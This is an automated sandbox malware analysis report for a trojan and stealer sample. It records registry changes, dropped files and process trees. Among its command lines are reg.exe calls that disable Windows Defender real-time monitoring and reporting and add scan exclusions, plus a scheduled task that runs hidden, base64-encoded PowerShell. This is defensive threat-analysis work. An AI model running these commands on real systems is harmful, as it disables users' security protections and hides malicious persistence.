Malware Analysis Report

2025-08-10 23:14

Sample ID 221031-1zkenaedem
Target file.zip
SHA256 a8f85ce5a2d7c22a8687252c1c1ff77180f0fe2d101d0d54e00a863d42b3abac
Tags
evasion spyware stealer trojan discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a8f85ce5a2d7c22a8687252c1c1ff77180f0fe2d101d0d54e00a863d42b3abac

Threat Level: Known bad

The file file.zip was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan discovery

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Executes dropped EXE

Blocklisted process makes network request

Checks BIOS information in registry

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Drops desktop.ini file(s)

Drops Chrome extension

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-10-31 22:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:08

Platform

win7-20220812-en

Max time kernel

153s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SvbbHukzU\TThBQi.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gGPOIrlNR" /SC once /ST 18:54:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gGPOIrlNR"

C:\Windows\system32\taskeng.exe

taskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

